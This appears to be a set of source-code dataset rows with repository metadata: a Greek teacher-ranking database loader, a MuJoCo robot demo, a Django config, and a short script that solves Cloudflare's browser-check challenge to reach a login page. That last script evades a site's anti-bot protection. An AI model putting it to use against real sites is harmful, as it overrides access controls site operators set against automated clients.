122dfe826c7c5c53f479eb39847069b57f6ed0de | 54f9074cb1ce68d71f0848a7f66b5272fb820288 | /scripts/kladoi.py | 08b64842e4da8dc2dac166cbdd618d647d9ca292 | [] | no_license | fkaralis/talaiporosanaplirotis | ee7827fccb38e70c834c5d6d19d36ef42ee882dd | 17f7b39655939b9e6559fbef65bcf8df4656468d | refs/heads/master | 2021-01-11T02:04:29.743459 | 2018-09-17T13:41:49 | 2018-09-17T13:41:49 | 70,840,487 | 2 | 3 | null | 2016-10-25T18:45:03 | 2016-10-13T19:25:45 | Python | UTF-8 | Python | false | false | 4,080 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
builds Klados table from given path
'''
import pandas as pd
from os import listdir
from os.path import isfile, isdir, join
import sqlalchemy
import pandas
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import exists
from db_init_eidikothtes_dev import Base, Klados, Real_eidikothta
# Connect to the SQLite database and open an ORM session.
engine = create_engine('sqlite:///talaiporosanaplirotis_eidikothtes_dev.sqlite')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()

# Root directory: one sub-directory per ranking table, containing Excel files.
path = '../data/2016-2017/eniaios_smea_anap_16/'
#path = 'test/'
directories = sorted([d for d in listdir(path) if isdir(join(path, d))])
for dir in directories:
    filepath = join(path, dir) + '/'
    print(filepath)
    files = sorted([(filepath + f) for f in listdir(filepath) if isfile(join(filepath, f))])
    for f in files:
        # kladoi (branch codes) seen in this file but not yet in the DB
        kodikoi_kladwn = []
        kladoi = []
        print(f)
        try:
            df = pd.read_excel(f, header=0)
            for row in df.iterrows():
                kodikos_kladoy = row[1]['ΚΛΑΔΟΣ']
                try:
                    # klados already in DB -> nothing to do
                    session.query(Klados).filter(Klados.kodikos_kladoy == kodikos_kladoy).one()
                except sqlalchemy.orm.exc.NoResultFound:
                    # klados not in DB
                    if kodikos_kladoy not in kodikoi_kladwn:
                        # new klados found in file
                        kodikoi_kladwn.append(kodikos_kladoy)
                        if kodikos_kladoy.endswith('.50'):
                            # Special-education (ΣΜΕΑ) variant: derive the
                            # label from the base klados, suffixed ' ΕΑΕ'.
                            try:
                                lektiko_kladoy = session.query(Klados).filter(Klados.kodikos_kladoy
                                    == kodikos_kladoy[:-3]).one().lektiko_kladoy + ' ΕΑΕ'
                            except Exception:
                                print('SMEA', kodikos_kladoy, 'not found')
                                lektiko_kladoy = kodikos_kladoy
                            try:
                                kodikos_real_eidikothtas = row[1]['ΟΜΑΔΟΠΟΙΗΜΕΝΗ ΕΙΔΙΚΟΤΗΤΑ']
                            except KeyError as e:
                                print(e, 'column not found')
                        else:
                            # Regular (Ενιαίος) table: label comes from the sheet.
                            try:
                                lektiko_kladoy = row[1]['ΛΕΚΤΙΚΟ ΚΛΑΔΟΥ']
                            except KeyError as e:
                                print(e, 'column not found')
                                lektiko_kladoy = kodikos_kladoy
                            try:
                                kodikos_real_eidikothtas = row[1]['ΕΙΔΙΚΟΤΗΤΑ']
                            except KeyError as e:
                                print(e, 'column not found')
                        # Resolve the foreign key to the real specialty, 0 if unknown.
                        try:
                            real_eidikothta_id = session.query(Real_eidikothta).filter(Real_eidikothta.kodikos_real_eidikothtas
                                == kodikos_real_eidikothtas).one().id
                        except Exception:
                            print('real eidikothta not found, setting to 0')
                            real_eidikothta_id = 0
                        new_klados = Klados(kodikos_kladoy = kodikos_kladoy,
                                            lektiko_kladoy = lektiko_kladoy,
                                            real_eidikothta_id = real_eidikothta_id)
                        kladoi.append(new_klados)
            # Persist everything collected from this file in one commit.
            for klados in kladoi:
                print(filepath, klados.kodikos_kladoy, klados.lektiko_kladoy, klados.real_eidikothta_id)
                session.add(klados)
            session.commit()
        except Exception as e:
            # Best effort: report the failure and move on to the next file.
            print(e)
| [
"fivoskaralis@gmail.com"
] | fivoskaralis@gmail.com |
1e627aaff1f0c48f994b092b322f45d4c1ded3fb | b99590ca634710c0c41d650220766fcd230c4749 | /demos/mujoco/robot_control_scene_creation/Demo_Point_Cloud.py | c809ff9320f22cebc3c927a8e8f47b412f2be80a | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | Yabing67/SimulationFrameworkPublic | 9db38749050c830f906f54f16688013216f90e4d | fc052c21e400a175d5d44e00afe1303d32f3886a | refs/heads/master | 2023-06-24T22:16:17.769225 | 2021-07-20T17:47:38 | 2021-07-20T17:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,358 | py | import classic_framework.mujoco.mujoco_utils.mujoco_controllers as mj_ctrl
from classic_framework.mujoco.MujocoRobot import MujocoRobot
from classic_framework.mujoco.MujocoScene import MujocoScene as Scene
from classic_framework.mujoco.mujoco_utils.mujoco_scene_object import MujocoPrimitiveObject
if __name__ == '__main__':
    # Build six colored boxes from (position, name, rgba) specs instead of six
    # near-identical assignments; values are byte-identical to the originals.
    box_specs = [
        ([.5, -0.2, 0.35], "box1", [0.1, 0.25, 0.3, 1]),
        ([.6, -0.1, 0.35], "box2", [0.2, 0.3, 0.7, 1]),
        ([.4, -0.1, 0.35], "box3", [1, 0, 0, 1]),
        ([.6, -0.0, 0.35], "box4", [1, 0, 0, 1]),
        ([.6, 0.1, 0.35], "box5", [1, 1, 1, 1]),
        ([.6, 0.2, 0.35], "box6", [1, 0, 0, 1]),
    ]
    boxes = [MujocoPrimitiveObject(obj_pos=pos, obj_name=name, geom_rgba=rgba)
             for pos, name, rgba in box_specs]
    work_table = MujocoPrimitiveObject(obj_pos=[0.5, 0.0, 0.2],
                                       obj_name="table0",
                                       geom_size=[0.25, 0.35, 0.2],
                                       mass=2000)

    # Mocap control; constructing Scene without `control` would use IK control.
    scene = Scene(object_list=boxes + [work_table], control=mj_ctrl.MocapControl())

    move_time = 1  # seconds per Cartesian motion segment
    robot = MujocoRobot(scene, gravity_comp=True, num_DoF=7)
    robot.set_gripper_width = 0.0

    # Remember the starting pose so the robot can return home between picks.
    home_pos = robot.current_c_pos
    home_quat = robot.current_c_quat

    # Approach box1, open, descend, close, and return home.
    robot.gotoCartPositionAndQuat([0.5, -0.2, 0.6 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.set_gripper_width = 0.04
    robot.gotoCartPositionAndQuat([0.5, -0.2, 0.52 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.set_gripper_width = 0.00
    robot.gotoCartPositionAndQuat(home_pos, home_quat, duration=move_time)

    # Capture and display a point cloud from the in-hand camera.
    points_inhand, colors_inhand = scene.get_point_cloud_inHandCam()
    scene.visualize_point_clouds(points_inhand, colors_inhand)

    # Drop zone, then pick box2 and return home.
    robot.gotoCartPositionAndQuat([0.5, 0.2, 0.6 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.set_gripper_width = 0.04
    robot.gotoCartPositionAndQuat([0.6, -0.1, 0.6 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.gotoCartPositionAndQuat([0.6, -0.1, 0.52 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.set_gripper_width = 0.00
    robot.gotoCartPositionAndQuat(home_pos, home_quat, duration=move_time)

    # Drop zone again, then pick box3 and return home.
    robot.gotoCartPositionAndQuat([0.5, 0.2, 0.6 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.set_gripper_width = 0.04
    robot.gotoCartPositionAndQuat([.4, -0.1, 0.6 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.gotoCartPositionAndQuat([.4, -0.1, 0.52 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.set_gripper_width = 0.00
    robot.gotoCartPositionAndQuat(home_pos, home_quat, duration=move_time)

    # Capture and display a point cloud from the fixed cage camera.
    points_cage, colors_cage = scene.get_point_cloud_CageCam()
    scene.visualize_point_clouds(points_cage, colors_cage)

    # Final release above the drop zone, then return home.
    robot.gotoCartPositionAndQuat([0.5, 0.2, 0.65 - 0.1], [0, 1, 0, 0], duration=move_time)
    robot.set_gripper_width = 0.04
    robot.gotoCartPositionAndQuat(home_pos, home_quat, duration=move_time)
| [
"ge.li@kit.edu"
] | ge.li@kit.edu |
80eb6b6100c4e2ed80fed96a55cc7f3f4610d39e | 60b42a25eae1148600c83051444947216f766d6a | /Borrowings/apps.py | b4e0749e0703d9bd9e9ebe69678aa88942dcda9f | [] | no_license | SaketZode/ExpenseManagerBackend | d060c61ebc2c533291d6154ea84b41b217fc919c | 85f7a9426485abc53168bc926ccca885bf754383 | refs/heads/master | 2023-02-16T06:12:48.904544 | 2021-01-17T14:09:35 | 2021-01-17T14:09:35 | 308,875,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | from django.apps import AppConfig
class BorrowingsConfig(AppConfig):
    """Django application configuration for the ``Borrowings`` app."""
    name = 'Borrowings'  # dotted module path Django uses to register this app
| [
"55745771+SaketZode@users.noreply.github.com"
] | 55745771+SaketZode@users.noreply.github.com |
b6c27d4355423ad57305b93778a6c56636871433 | 3221b73723fa7be24be2541ef690dfc6d0dbc313 | /example.py | 06a2a932271e2ab1e9b41b76bf11440ffe85ed6b | [] | no_license | ayourk/pycfl | abfd57e9aa06ff2072a214ffdab1d59fa1356a3d | 21a80b8b1ebef5bc2a185060cae6d17312c68d12 | refs/heads/master | 2022-12-10T12:08:21.237216 | 2018-04-07T11:03:05 | 2018-04-07T11:03:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | import re
import requests
import time
from pycfl import pycfl
# Fetch the NordVPN login page; if Cloudflare's "Checking your browser"
# interstitial (IUAM mode) intercepts it, solve the JS challenge with pycfl
# and submit the answer so the session obtains a clearance cookie.
r = requests.Session()  # Session keeps cookies across the challenge round-trip
rc = r.get("https://nordvpn.com/login").text
# Use a context manager so the log file is flushed and closed deterministically
# (the original `open(...).write(...)` leaked the handle to the GC).
with open('gdown.log', 'w') as log:
    log.write(rc)
if 'Checking your browser before accessing' in rc:
    ans = pycfl(rc)  # computed answer to the obfuscated JS challenge
    # Hidden form fields that must be echoed back with the answer.
    jschl_vc = re.search('name="jschl_vc" value="(.+?)"', rc).group(1)
    jschl_pass = re.search('name="pass" value="(.+?)"', rc).group(1)
    params = {'jschl_vc': jschl_vc,
              'pass': jschl_pass,
              'jschl_answer': ans}
    rc = r.get('https://nordvpn.com/cdn-cgi/l/chk_jschl', params=params).text
    with open('gdown.log', 'w') as log:
        log.write(rc)
| [
"piotr.staroszczyk@get24.org"
] | piotr.staroszczyk@get24.org |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.